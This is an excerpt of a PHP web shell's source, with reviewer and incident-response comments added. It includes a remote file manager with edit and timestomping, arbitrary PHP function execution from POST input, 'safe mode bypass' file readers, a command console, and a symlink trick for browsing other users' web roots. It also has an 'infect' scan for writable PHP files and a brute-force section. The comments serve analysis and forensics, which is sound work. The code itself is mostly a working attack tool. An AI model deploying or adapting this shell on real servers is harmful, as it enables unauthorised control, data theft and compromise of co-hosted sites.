528 $h = opendir($c.$s);
529 while (($f = readdir($h)) !== false)
530 if (($f != ".") and ($f != "..")) {
531 copy_paste($c.$s.'/',$f, $d.$s.'/');
532 }
533 } elseif(is_file($c.$s)) {
534 @copy($c.$s, $d.$s);
535 }
536 }
537 foreach($_SESSION['f'] as $f)
538 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
539 }
540 unset($_SESSION['f']);
541 break;
    // Any other p1: for 'copy' or 'move', store the selection (names
    // urldecoded) and the source directory in the session for a later 'paste'.
542 default:
543 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
544 $_SESSION['act'] = @$_POST['p1'];
545 $_SESSION['f'] = @$_POST['f'];
546 foreach($_SESSION['f'] as $k => $f)
547 $_SESSION['f'][$k] = urldecode($f);
548 $_SESSION['cwd'] = @$_POST['c'];
549 }
550 break;
551 }
    // Blank p1/p2 in the hidden form, presumably so a resubmit does not repeat
    // the operation.
552 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
553 }
    // The listing target is the raw 'c' parameter when present, while the
    // per-entry stat calls below use $GLOBALS['cwd']; the two coincide only
    // when the chdir() at the top of the script succeeded.
554 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
555 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
    // Sort spec arrives in p1 as s_<column>_<0|1>. Note [A-z] also admits the
    // six punctuation characters between 'Z' and 'a'.
556 global $sort;
557 $sort = array('name', 1);
558 if(!empty($_POST['p1'])) {
559 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
560 $sort = array($match[1], (int)$match[2]);
561 }
562?>
563<script>
564 function sa() {
565 for(i=0;i<document.files.elements.length;i++)
566 if(document.files.elements[i].type == 'checkbox')
567 document.files.elements[i].checked = document.files.elements[0].checked;
568 }
569</script>
570<table width='100%' class='main' cellspacing='0' cellpadding='2'>
571<form name=files method=post>
572<?php
    // Header row: each sortable column toggles the direction bit.
573 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
574 $dirs = $files = $links = array();
575 $n = count($dirContent);
    // Owner/group are looked up by bare name (relative to the process cwd),
    // everything else by the full $GLOBALS['cwd'] path; the numeric id is shown
    // when the posix lookup returns false. '.' is dropped, '..' is kept.
576 for($i=0;$i<$n;$i++) {
577 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
578 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
579 $tmp = array('name' => $dirContent[$i],
580 'path' => $GLOBALS['cwd'].$dirContent[$i],
581 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
582 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
583 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
584 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
585 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
586 );
587 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
588 $files[] = array_merge($tmp, array('type' => 'file'));
589 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
590 $links[] = array_merge($tmp, array('type' => 'link'));
591 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
592 $dirs[] = array_merge($tmp, array('type' => 'dir'));
593 }
    // Comparator reads the sort spec from $GLOBALS. The size branch never
    // returns 0, so entries of equal size keep an unspecified order.
594 $GLOBALS['sort'] = $sort;
595 function cmp($a, $b) {
596 if($GLOBALS['sort'][0] != 'size')
597 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
598 else
599 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
600 }
601 usort($files, "cmp");
602 usort($dirs, "cmp");
603 usort($links, "cmp");
    // Directories first, then links, then files; rows alternate the 'l1' class.
    // The displayed name goes through htmlspecialchars(); the directory path
    // embedded in the onclick handler does not.
604 $files = array_merge($dirs, $links, $files);
605 $l = 0;
606 foreach($files as $f) {
607 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
608 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
609 $l = $l?0:1;
610 }
611 ?>
612 <tr><td colspan=7>
613 <input type=hidden name=a value='FilesMan'>
614 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
615 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
616 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr>
617 </form></table></div>
618 <?php
619 printFooter();
620}
// 'String tools' page: applies the PHP function named in p1 to the p2 string.
// The $stringTools table only populates the <select>; both execution paths
// call $_POST['p1']($_POST['p2']) guarded solely by function_exists(), so the
// callable set is not limited to that table. The hex2bin() polyfill returns a
// bit string (decbin(hexdec())), while the native hex2bin() of PHP >= 5.4
// returns raw bytes, so the 'HEX to BIN' result depends on the PHP version.
621function actionStringTools() {
622 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
623 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
624 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
625 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
626
    // AJAX path mirrors actionPhp(): length-prefixed JS that fills #strOutput.
627 if(isset($_POST['ajax'])) {
628 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
629 ob_start();
630 if(function_exists($_POST['p1']))
631 echo $_POST['p1']($_POST['p2']);
632 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
633 echo strlen($temp), "\n", $temp;
634 exit;
635 }
636 printHeader();
637 echo '<h1>String conversions</h1><div class=content>';
    // Label => function name shown in the <select>.
638 $stringTools = array(
639 'Base64 encode' => 'base64_encode',
640 'Base64 decode' => 'base64_decode',
641 'Url encode' => 'urlencode',
642 'Url decode' => 'urldecode',
643 'Full urlencode' => 'full_urlencode',
644 'md5 hash' => 'md5',
645 'sha1 hash' => 'sha1',
646 'crypt' => 'crypt',
647 'CRC32' => 'crc32',
648 'ASCII to HEX' => 'ascii2hex',
649 'HEX to ASCII' => 'hex2ascii',
650 'HEX to DEC' => 'hexdec',
651 'HEX to BIN' => 'hex2bin',
652 'DEC to HEX' => 'dechex',
653 'DEC to BIN' => 'decbin',
654 'BIN to HEX' => 'bin2hex',
655 'BIN to DEC' => 'bindec',
656 'String to lower case' => 'strtolower',
657 'String to upper case' => 'strtoupper',
658 'Htmlspecialchars' => 'htmlspecialchars',
659 'String length' => 'strlen',
660 );
661 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
662 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    // Non-AJAX page: tool selector, input textarea (previous p2 re-shown
    // escaped), AJAX checkbox, then the escaped result in the <pre>.
663 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
664 foreach($stringTools as $k => $v)
665 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
666 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
667 if(!empty($_POST['p1'])) {
668 if(function_exists($_POST['p1']))
669 echo htmlspecialchars($_POST['p1']($_POST['p2']));
670 }
671 echo"</pre></div>";
    // Hash lookup form: posts the 'hash' field to third-party sites in a new tab.
672 ?>
673 <br><h1>Search for hash:</h1><div class=content>
674 <form method='post' target='_blank' name="hf">
675 <input type="text" name="hash" style="width:200px;"><br>
676 <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>
677 <input type="button" value="fakenamegenerator.com" onclick="document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()"><br>
678 <input type="button" value="tools4noobs.com" onclick="document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()"><br>
679 <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
680 <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
681 </form>
682 </div>
683 <?php
684 printFooter();
685}
// Handler for the 'FilesTools' action: single-file operations on the path in
// $_POST['p1'], selected by $_POST['p2'] (download, mkfile, view, highlight,
// chmod, edit, hexdump, rename, touch). $_POST['p3'] carries the operation
// argument (mode string, file content, new name or timestamp).
// Every filesystem call is '@'-suppressed, so failures never reach the PHP
// error log: the only traces are the web server's access-log entry for the
// POST and the change on disk. No path restriction of any kind is applied.
// printHeader(), printFooter(), viewSize(), viewPermsColor() and the
// client-side g() helper are defined elsewhere in the file.
function actionFilesTools() {
 if( isset($_POST['p1']) )
 $_POST['p1'] = urldecode($_POST['p1']);
 // 'download': streams the raw file through a gzip output buffer and exits
 // before any HTML is produced. The is_dir() branch is empty, so a directory
 // path simply exits with no output.
 if(@$_POST['p2']=='download') {
 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
 ob_start("ob_gzhandler", 4096);
 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 if (function_exists("mime_content_type")) {
 $type = @mime_content_type($_POST['p1']);
 header("Content-Type: ".$type);
 }
 $fp = @fopen($_POST['p1'], "r");
 if($fp) {
 while(!@feof($fp))
 echo @fread($fp, 1024);
 fclose($fp);
 }
 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
 }
 exit;
 }
 // 'mkfile': creates an empty file (only when it does not exist yet) and
 // then falls through to the 'edit' view for it.
 if( @$_POST['p2'] == 'mkfile' ) {
 if(!file_exists($_POST['p1'])) {
 $fp = @fopen($_POST['p1'], 'w');
 if($fp) {
 $_POST['p2'] = "edit";
 fclose($fp);
 }
 }
 }
 printHeader();
 echo '<h1>File tools</h1><div class=content>';
 if( !file_exists(@$_POST['p1']) ) {
 echo 'File not exists';
 printFooter();
 return;
 }
 // NOTE(review): both lookups use fileowner(); $gid should come from
 // filegroup(), so the "Group" shown is the group whose gid equals the
 // owner's uid.
 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
 if( empty($_POST['p2']) )
 $_POST['p2'] = 'view';
 // Sub-action menu: regular files get the full set, directories only
 // chmod/rename/touch.
 if( is_file($_POST['p1']) )
 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
 else
 $m = array('Chmod', 'Rename', 'Touch');
 foreach($m as $v)
 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
 echo '<br><br>';
 switch($_POST['p2']) {
 // 'view': file contents, HTML-escaped, inside a <pre>.
 case 'view':
 echo '<pre class=ml1>';
 $fp = @fopen($_POST['p1'], 'r');
 if($fp) {
 while( !@feof($fp) )
 echo htmlspecialchars(@fread($fp, 1024));
 @fclose($fp);
 }
 echo '</pre>';
 break;
 // 'highlight': highlight_file() output with <span> swapped for <font>.
 case 'highlight':
 if( is_readable($_POST['p1']) ) {
 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 $code = highlight_file($_POST['p1'],true);
 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 }
 break;
 // 'chmod': $_POST['p3'] is an octal digit string converted by hand
 // (least significant digit first); on success the page is reloaded.
 case 'chmod':
 if( !empty($_POST['p3']) ) {
 $perms = 0;
 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 if(!@chmod($_POST['p1'], $perms))
 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 else
 die('<script>g(null,null,null,null,"")</script>');
 }
 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 break;
 // 'edit': writes $_POST['p3'] verbatim over the file, then shows the
 // current contents in a textarea. This is the shell's file-write path;
 // file-integrity monitoring of the web root is the control that sees it.
 case 'edit':
 if( !is_writable($_POST['p1'])) {
 echo 'File isn\'t writeable';
 break;
 }
 if( !empty($_POST['p3']) ) {
 @file_put_contents($_POST['p1'],$_POST['p3']);
 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
 }
 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
 $fp = @fopen($_POST['p1'], 'r');
 if($fp) {
 while( !@feof($fp) )
 echo htmlspecialchars(@fread($fp, 1024));
 @fclose($fp);
 }
 echo '</textarea><input type=submit value=">>"></form>';
 break;
 // 'hexdump': 32 bytes per row; $h[0], $h[1], $h[2] hold the offset, hex
 // and printable columns. NUL, tab, LF and CR are rendered as spaces.
 case 'hexdump':
 $c = @file_get_contents($_POST['p1']);
 $n = 0;
 $h = array('00000000<br>','','');
 $len = strlen($c);
 for ($i=0; $i<$len; ++$i) {
 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 switch ( ord($c[$i]) ) {
 case 0: $h[2] .= ' '; break;
 case 9: $h[2] .= ' '; break;
 case 10: $h[2] .= ' '; break;
 case 13: $h[2] .= ' '; break;
 default: $h[2] .= $c[$i]; break;
 }
 $n++;
 if ($n == 32) {
 $n = 0;
 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 $h[1] .= '<br>';
 $h[2] .= "\n";
 }
 }
 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 break;
 // 'rename': rename() to $_POST['p3'] and reload the page on the new path.
 case 'rename':
 if( !empty($_POST['p3']) ) {
 if(!@rename($_POST['p1'], $_POST['p3']))
 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
 else
 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 }
 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 break;
 // 'touch': sets atime and mtime to the supplied time (timestomping).
 // Forensics note: on a host where this ran, file mtimes are not a
 // reliable basis for a timeline.
 case 'touch':
 if( !empty($_POST['p3']) ) {
 $time = strtotime($_POST['p3']);
 if($time) {
 if(@touch($_POST['p1'],$time,$time))
 die('<script>g(null,null,null,null,"")</script>');
 else {
 echo 'Fail!<script>document.mf.p3.value="";</script>';
 }
 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
 }
 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 break;
 // 'mkfile' was already rewritten to 'edit' above; nothing is left to do.
 case 'mkfile':

 break;
 }
 echo '</div>';
 printFooter();
}
// Handler for the 'SafeMode' action: reads a file or lists a directory via
// one of six alternative PHP facilities, picked by $_POST['p1'] (1..6), with
// the path in $_POST['p2'] (and a range end in $_POST['p3'] for case 5).
// Output is captured with ob_start() and rendered, unescaped, under the form.
// Code-audit note: the ini_restore("safe_mode") / ini_restore("open_basedir")
// pair (case 4) and a "file://" URL with an embedded "\x00" handed to
// curl_init() (case 3) are distinctive strings worth flagging in source scans.
function actionSafeMode() {
 $temp='';
 ob_start();
 switch($_POST['p1']) {
 // 1: copy() through the compress.zlib:// wrapper into a temp file, print
 // it, delete it. NOTE(review): $test is never assigned in this function,
 // so tempnam() receives an undefined directory argument (presumably it
 // falls back to the system temp dir -- confirm).
 case 1:
 $temp=@tempnam($test, 'cx');
 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
 echo @file_get_contents($temp);
 unlink($temp);
 } else
 echo 'Sorry... Can\'t open file';
 break;
 // 2: glob() of "<path>*", one match per line.
 case 2:
 $files = glob($_POST['p2'].'*');
 if( is_array($files) )
 foreach ($files as $filename)
 echo $filename."\n";
 break;
 // 3: curl on a file:// URL built from the path, a NUL byte and SELF_PATH
 // (__FILE__, defined in the file header); curl writes straight to the buffer.
 case 3:
 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
 curl_exec($ch);
 break;
 // 4: resets safe_mode/open_basedir and include()s the path. If the target
 // contains PHP it is executed, not merely displayed.
 case 4:
 ini_restore("safe_mode");
 ini_restore("open_basedir");
 include($_POST['p2']);
 break;
 // 5: walks uids $_POST['p2']..$_POST['p3'] through posix_getpwuid() and
 // prints each passwd entry colon-joined.
 case 5:
 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
 $uid = @posix_getpwuid($_POST['p2']);
 if ($uid)
 echo join(':',$uid)."\n";
 }
 break;
 // 6: imap_open() with the path as the mailbox spec, printing message 1.
 case 6:
 if(!function_exists('imap_open'))break;
 $stream = imap_open($_POST['p2'], "", "");
 if ($stream == FALSE)
 break;
 echo imap_body($stream, 1);
 imap_close($stream);
 break;
 }
 $temp = ob_get_clean();
 printHeader();
 echo '<h1>Safe mode bypass</h1><div class=content>';
 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
 // Captured output is emitted without HTML escaping.
 if($temp)
 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
 echo '</div>';
 printFooter();
}
// Handler for the 'Console' action: passes the command line in $_POST['p1']
// to ex() (defined elsewhere in the file; presumably the command-execution
// helper -- not visible here) and returns its output.
// AJAX mode (isset($_POST['ajax'])): replies with a JavaScript snippet,
// prefixed by its byte length, that appends the output to the console
// textarea. If the command ends in "cd <dir>", the server process also
// chdir()s there and the new cwd is pushed into the hidden 'c' form field.
// Non-AJAX mode: renders the full page, with $GLOBALS['aliases'] (the canned
// command list from the file header) as a dropdown and the output in a
// read-only textarea. The inline <script> keeps a client-side command
// history (cmds[]) navigated with the up/down arrow keys.
function actionConsole() {
 if(isset($_POST['ajax'])) {
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
 ob_start();
 echo "document.cf.cmd.value='';\n";
 // Output is converted from the client charset to UTF-8 and escaped for a
 // single-quoted JS string literal.
 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
 // A trailing "cd <dir>" changes the server-side working directory.
 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
 if(@chdir($match[1])) {
 $GLOBALS['cwd'] = @getcwd();
 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
 }
 }
 echo "document.cf.output.value+='".$temp."';";
 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
 $temp = ob_get_clean();
 // Response format: "<length>\n<javascript>".
 echo strlen($temp), "\n", $temp;
 exit;
 }
 printHeader();
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38) {
 cur--;
 if(cur>=0)
 document.cf.cmd.value = cmds[cur];
 else
 cur++;
 } else if(n == 40) {
 cur++;
 if(cur < cmds.length)
 document.cf.cmd.value = cmds[cur];
 else
 cur--;
 }
}
function add(cmd) {
 cmds.pop();
 cmds.push(cmd);
 cmds.push("");
 cur = cmds.length-1;
}
</script>
<?php
 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
 // Aliases with an empty command are rendered as group labels.
 foreach($GLOBALS['aliases'] as $n => $v) {
 if($v == '') {
 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
 continue;
 }
 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
 }
 // A non-AJAX submission carrying a command clears the sticky AJAX flag.
 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
 if(!empty($_POST['p1'])) {
 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
 }
 echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
 echo '</form></div><script>document.cf.cmd.focus();</script>';
 printFooter();
}
// Handler for 'Logout': clears the session flag that gates access (keyed on
// md5(HTTP_HOST), set in the file header). Only that key is unset -- the
// session itself is not destroyed -- and no header/footer is printed.
function actionLogout() {
 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
 echo 'bye!';
}
// Handler for 'SelfRemove': unlinks SELF_PATH (__FILE__, from the file header)
// once $_POST['p1'] == 'yes'; otherwise shows a confirmation link.
// IR note: this removes only the script on disk. Web server access logs,
// PHP session files and artifacts created by the other actions remain.
function actionSelfRemove() {
 printHeader();
 if($_POST['p1'] == 'yes') {
 if(@unlink(SELF_PATH))
 die('Shell has been removed');
 else
 echo 'unlink error!';
 }
 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
 printFooter();
}
// Handler for 'Tools': empty placeholder -- prints the page header and
// footer and nothing else.
function actionTools() {
 printHeader();

 printFooter();
}
// Handler for 'Domains': lists the zones named in /etc/named.conf, the owner
// of each (via /etc/valiases/<zone>) and a link into that owner's public_html
// through a symlink to "/".
// On-disk artifacts (IR): a "sym" directory with an .htaccess whose content
// is $c, and the symlink "0/x.txt" -> "/". Note the link is created under
// "0/", not "sym/", while the generated links reference "sym/x.txt/..." --
// the two paths are inconsistent as written.
// eregi() was removed in PHP 7, so this action fatals on current PHP.
function actionDomains() {
 printHeader();
 error_reporting(0);
echo "<title>#Domains & Users</title>";
mkdir("sym");
symlink("/","0/x.txt");
$c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
// NOTE(review): $f is never fclose()d.
$f = fopen ('sym/.htaccess','w');
 fwrite($f , $c);

$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]"); }
echo "<table align=center border=1>
<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
// One row per 'zone "<name>"' line; only the first match on a line is used.
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>"; flush();
}}}
echo "</table>
<p align='center'>
FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a
href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br>
</p>
";
 printFooter();
}
// Handler for 'Infect'. Despite the name, the visible code only enumerates:
// it recursively walks DOCUMENT_ROOT with the nested ListFiles() helper and
// prints every writable .php file other than the shell itself, then a count.
// No file is modified in this version.
// NOTE(review): $i is never initialised; ListFiles() is declared inside the
// if-branch and lands in the global function table once it runs; and
// `while($file = readdir($dh))` stops early on an entry literally named "0".
function actionInfect() {
 printHeader();
 echo '<h1>Infect</h1><div class=content>';
 if($_POST['p1'] == 'infect') {
 $target=$_SERVER['DOCUMENT_ROOT'];
 // Recursive listing of all regular files below $dir; returns nothing
 // (null) when opendir() fails, which the recursive call guards against
 // with is_array() but the top-level foreach does not.
 function ListFiles($dir) {
 if($dh = opendir($dir)) {
 $files = Array();
 $inner_files = Array();
 while($file = readdir($dh)) {
 if($file != "." && $file != "..") {
 if(is_dir($dir . "/" . $file)) {
 $inner_files = ListFiles($dir . "/" . $file);
 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
 } else {
 array_push($files, $dir . "/" . $file);
 }
 }
 }
 closedir($dh);
 return $files;
 }
 }
 foreach (ListFiles($target) as $key=>$file){
 $nFile = substr($file, -4, 4);
 if($nFile == ".php" ){
 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
 echo "$file<br>";
 $i++;
 }
 }
 }
 echo "<font color=red size=14>$i</font>";
 }else{
 echo "<form method=post><input type=submit value=Infect name=infet></form>";
 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
 }
 printFooter();
}
// Handler for 'Bruteforce': credential guessing against $_POST['server']
// ("host:port") with a bruteForce() helper declared on the fly according to
// $_POST['proto'] (ftp | mysql | pgsql).
// type 1: every login in /etc/passwd is tried with itself as the password
// and, when 'reverse' is set, with the login reversed; type 2: each line of
// the dictionary file $_POST['dict'] is tried against $_POST['login'].
// NOTE(review): only the FTP helper is coherent as written. The mysql and
// pgsql helpers have an operator-precedence error in the port expression,
// the pgsql one references an undefined $server and never uses $str, and
// mysql_* was removed in PHP 7.
